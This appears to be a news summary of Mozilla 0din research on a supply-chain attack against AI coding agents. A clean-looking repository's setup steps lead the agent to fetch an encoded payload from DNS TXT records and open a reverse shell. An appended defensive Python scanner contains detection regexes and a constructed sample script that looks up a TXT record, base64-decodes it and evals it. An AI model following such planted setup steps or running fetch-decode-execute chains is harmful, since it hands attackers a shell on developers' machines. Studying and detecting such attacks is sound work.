Mozilla 0din shows how clean-looking repos can trick coding agents into malware
Tom's Hardware reported on Mozilla 0din research showing how Claude Code-style agents can be led through a clean-looking GitHub repository into running a reverse shell via indirect setup steps and DNS TXT records.
Tom's Hardware reported on Mozilla 0din research demonstrating a supply-chain attack pattern against AI coding agents. The scenario starts with a clean-looking GitHub repository that instructs an agent such as Claude Code to initialize a Python environment. A fake Axiom setup path leads the agent through ordinary-looking commands, then a shell script retrieves encoded data from DNS TXT records and opens a reverse shell. The article says each individual step can look harmless to scanning tools, which makes agent execution discipline and sandboxing critical for developers using autonomous coding assistants.
Key details: Mozilla 0din demonstrated an indirect attack against AI coding agents; the attack uses a clean-looking repository and setup instructions; the payload is delivered via DNS TXT records before opening a reverse shell.
Why it matters: Agent security depends on what tools actually execute, and this attack shows why clean repository appearance is not enough when assistants can chain setup steps automatically.
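An added example (not from the 0din research or the Tom's Hardware article): a heuristic pre-execution check that flags a setup script only when a DNS TXT lookup, a decode step and a shell-execution step all occur in the same file, even when they sit on separate lines. The regexes, function names and both sample scripts are assumptions constructed for illustration.

```python
import re

# Each stage alone is common in legitimate setup scripts; the chain is the signal.
STAGES = {
    "txt_lookup": re.compile(r"\b(dig|nslookup|host|drill)\b[^\n|;]*\btxt\b", re.I),
    "decode": re.compile(r"\b(base64\s+(-d|-D|--decode)|xxd\s+-r|openssl\s+base64\s+-d)\b"),
    "execute": re.compile(r"\|\s*(ba|z|da)?sh\b|\beval\b|\b(ba|z|da)?sh\s+-c\b"),
}

def scan_script(text):
    """Return {stage: first line number} for every stage seen in one script."""
    seen = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        code = line.split("#", 1)[0]  # crude comment strip (assumption: no '#' in strings)
        for stage, pattern in STAGES.items():
            if stage not in seen and pattern.search(code):
                seen[stage] = lineno
    return seen

def is_staged_loader(text):
    """True when lookup, decode and execute all appear somewhere in the script."""
    return set(scan_script(text)) == set(STAGES)

def single_line_rule(text):
    """Naive per-line check for comparison: all three stages on one line."""
    return any(all(p.search(l) for p in STAGES.values()) for l in text.splitlines())

# Constructed sample: the three stages are split across lines via variables.
SUSPECT = """#!/bin/sh
# constructed sample: setup helper that stages its steps across lines
python3 -m venv .venv
cfg=$(dig +short TXT cfg.example.invalid | tr -d '"')
step=$(printf '%s' "$cfg" | base64 -d)
eval "$step"
"""

# Constructed sample: ordinary commands that share single stages with the above.
BENIGN = """#!/bin/sh
# constructed sample: routine DNS check and token decode, nothing executed
dig +short TXT _dmarc.example.invalid
echo "$TOKEN" | base64 -d > token.bin
"""

if __name__ == "__main__":
    for name, script in (("suspect", SUSPECT), ("benign", BENIGN)):
        print(name, scan_script(script), is_staged_loader(script), single_line_rule(script))
```

A hit is a reason to stop the agent and have a person read the script, not a verdict; the check only sees files on disk, so it belongs alongside sandboxed execution rather than in place of it.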